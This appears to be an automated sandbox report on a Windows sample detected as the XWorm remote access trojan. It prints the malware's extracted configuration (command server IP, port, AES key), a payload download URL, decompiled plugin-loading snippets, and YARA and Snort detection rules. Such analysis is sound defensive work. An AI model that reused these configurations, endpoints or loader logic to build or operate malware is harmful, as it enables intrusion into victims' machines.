Edit tour

Windows Analysis Report
33-o_Installer.exe

Overview

General Information

Sample name:	33-o_Installer.exe
Analysis ID:	1466306
MD5:	baf30c254157b0f36a967ccfdb3850ed
SHA1:	0734a94d3cd6b3048d6d99c26b1fdea0cd19ab00
SHA256:	af40db9d594f00fe032b9b50177907efc872157abd3ab488c09584a0ceb3da04
Tags:	exe
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Uses known network protocols on non-standard ports

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

33-o_Installer.exe (PID: 4292 cmdline: "C:\Users\user\Desktop\33-o_Installer.exe" MD5: BAF30C254157B0F36A967CCFDB3850ED)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["117.41.184.33"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x121f3:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\33[1].ccp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
C:\Users\Public\Downloads\ind.cod	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.4498830874.0000000005820000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.4498830874.0000000005820000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6c80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6af2:$cnc4: POST / HTTP/1.1
00000000.00000002.4497904003.0000000003360000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000002.4498244402.0000000003631000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: 33-o_Installer.exe PID: 4292	JoeSecurity_XWorm	Yara detected XWorm	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.33-o_Installer.exe.5820000.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.33-o_Installer.exe.5820000.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6c80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6af2:$cnc4: POST / HTTP/1.1
0.2.33-o_Installer.exe.5820000.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.33-o_Installer.exe.5820000.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x4e80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x4f1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5032:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x4cf2:$cnc4: POST / HTTP/1.1

Snort Signatures

ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes - Source IP: 117.41.184.33 - Destination IP: 192.168.2.5

Timestamp:	07/02/24-19:25:03.515460
SID:	2852870
Source Port:	7000
Destination Port:	49705
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) - Source IP: 192.168.2.5 - Destination IP: 117.41.184.33

Timestamp:	07/02/24-19:25:03.516212
SID:	2852923
Source Port:	49705
Destination Port:	7000
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound - Source IP: 192.168.2.5 - Destination IP: 117.41.184.33

Timestamp:	07/02/24-19:23:08.005869
SID:	2853193
Source Port:	49705
Destination Port:	7000
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound - Source IP: 192.168.2.5 - Destination IP: 117.41.184.33

Timestamp:	07/02/24-19:21:17.025426
SID:	2855924
Source Port:	49705
Destination Port:	7000
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 - Source IP: 117.41.184.33 - Destination IP: 192.168.2.5

Timestamp:	07/02/24-19:24:50.403516
SID:	2852874
Source Port:	7000
Destination Port:	49705
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.4498244402.0000000003631000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["117.41.184.33"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Multi AV Scanner detection for submitted file

Source: 33-o_Installer.exe

ReversingLabs: Detection: 31%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 33-o_Installer.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.33-o_Installer.exe.5820000.1.raw.unpack	String decryptor: 117.41.184.33
Source: 0.2.33-o_Installer.exe.5820000.1.raw.unpack	String decryptor: 7000
Source: 0.2.33-o_Installer.exe.5820000.1.raw.unpack	String decryptor: <123456789>
Source: 0.2.33-o_Installer.exe.5820000.1.raw.unpack	String decryptor: <Xwormmm>
Source: 0.2.33-o_Installer.exe.5820000.1.raw.unpack	String decryptor: XWorm V5.6
Source: 0.2.33-o_Installer.exe.5820000.1.raw.unpack	String decryptor: USB.exe

Source: 33-o_Installer.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 33-o_Installer.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.5:49705 -> 117.41.184.33:7000
Source: Traffic	Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 117.41.184.33:7000 -> 192.168.2.5:49705
Source: Traffic	Snort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.5:49705 -> 117.41.184.33:7000
Source: Traffic	Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 117.41.184.33:7000 -> 192.168.2.5:49705
Source: Traffic	Snort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.5:49705 -> 117.41.184.33:7000

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 117.41.184.33

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 881
Source: unknown	Network traffic detected: HTTP traffic on port 881 -> 49704

Source: global traffic	TCP traffic: 192.168.2.5:49704 -> 91.208.240.157:881
Source: global traffic	TCP traffic: 192.168.2.5:49705 -> 117.41.184.33:7000

Source: Joe Sandbox View

ASN Name: CT-JIANGXI-IDCCHINANETJiangxprovinceIDCnetworkCN CT-JIANGXI-IDCCHINANETJiangxprovinceIDCnetworkCN

Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33
Source: unknown	TCP traffic detected without corresponding DNS query: 117.41.184.33

Source: C:\Users\user\Desktop\33-o_Installer.exe

Code function: 0_2_00DC25C8 __EH_prolog,InternetReadFile,

0_2_00DC25C8

Source: global traffic

HTTP traffic detected: GET /33.ccp HTTP/1.1User-Agent: DownloadHost: guanlix.cn:881Cache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: guanlix.cn

Source: 33-o_Installer.exe	String found in binary or memory: http://guanlix.cn:881/33.ccp
Source: 33-o_Installer.exe, 00000000.00000002.4497277372.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://guanlix.cn:881/33.ccp~
Source: 33-o_Installer.exe, 00000000.00000002.4498244402.0000000003631000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

System Summary

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0.2.33-o_Installer.exe.5820000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.33-o_Installer.exe.5820000.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.4498830874.0000000005820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.4497904003.0000000003360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\33[1].ccp, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Users\Public\Downloads\ind.cod, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Source: C:\Users\user\Desktop\33-o_Installer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: 0_2_00DD007E	0_2_00DD007E
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: 0_2_00DD5A2A	0_2_00DD5A2A
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: 0_2_00DD0BD6	0_2_00DD0BD6
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: 0_2_00DCFBE9	0_2_00DCFBE9
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: 0_2_00DD738F	0_2_00DD738F
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: 0_2_00DD54D9	0_2_00DD54D9
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: 0_2_00DD041C	0_2_00DD041C
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: 0_2_00DD6657	0_2_00DD6657
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: 0_2_00DD07EE	0_2_00DD07EE
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: 0_2_00DD7F4F	0_2_00DD7F4F
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: 0_2_00DD5F7B	0_2_00DD5F7B
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: 0_2_058355D8	0_2_058355D8
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: 0_2_0583A6B8	0_2_0583A6B8
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: 0_2_0583B3F8	0_2_0583B3F8
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: 0_2_0583ED84	0_2_0583ED84
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: 0_2_05834D08	0_2_05834D08
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: 0_2_058307A0	0_2_058307A0
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: 0_2_058349C0	0_2_058349C0

Source: C:\Users\user\Desktop\33-o_Installer.exe

Code function: String function: 00DCA9B0 appears 45 times

Source: 33-o_Installer.exe, 00000000.00000000.2037340785.0000000000DE3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamewindos.exe. vs 33-o_Installer.exe
Source: 33-o_Installer.exe, 00000000.00000002.4498830874.0000000005820000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient.exe4 vs 33-o_Installer.exe
Source: 33-o_Installer.exe	Binary or memory string: OriginalFilenamewindos.exe. vs 33-o_Installer.exe

Source: 33-o_Installer.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0.2.33-o_Installer.exe.5820000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.33-o_Installer.exe.5820000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.4498830874.0000000005820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.4497904003.0000000003360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\33[1].ccp, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: C:\Users\Public\Downloads\ind.cod, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: 0.2.33-o_Installer.exe.5820000.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.33-o_Installer.exe.5820000.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.33-o_Installer.exe.5820000.1.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/2@1/2

Source: C:\Users\user\Desktop\33-o_Installer.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\33[1].ccp

Jump to behavior

Source: C:\Users\user\Desktop\33-o_Installer.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\33-o_Installer.exe	Mutant created: \Sessions\1\BaseNamedObjects\20UmI84cKfMqQ1HH

Source: 33-o_Installer.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\33-o_Installer.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 33-o_Installer.exe

ReversingLabs: Detection: 31%

Source: C:\Users\user\Desktop\33-o_Installer.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Section loaded: winmm.dll	Jump to behavior

Source: C:\Users\user\Desktop\33-o_Installer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: 33-o_Installer.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: 33-o_Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 33-o_Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 33-o_Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 33-o_Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 33-o_Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.33-o_Installer.exe.5820000.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.33-o_Installer.exe.5820000.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 0.2.33-o_Installer.exe.5820000.1.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.33-o_Installer.exe.5820000.1.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.33-o_Installer.exe.5820000.1.raw.unpack, Messages.cs	.Net Code: Memory

Source: C:\Users\user\Desktop\33-o_Installer.exe

Code function: 0_2_00DD40E4 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00DD40E4

Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: 0_2_00DCA9F5 push ecx; ret	0_2_00DCAA08
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: 0_2_00DC4948 push eax; ret	0_2_00DC4966
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: 0_2_00DC6649 push ecx; ret	0_2_00DC665C
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: 0_2_0583C4D0 push eax; retf 034Fh	0_2_0583D055
Source: C:\Users\user\Desktop\33-o_Installer.exe	Code function: 0_2_05836B88 pushad ; ret	0_2_05836B89

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 881
Source: unknown	Network traffic detected: HTTP traffic on port 881 -> 49704

Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
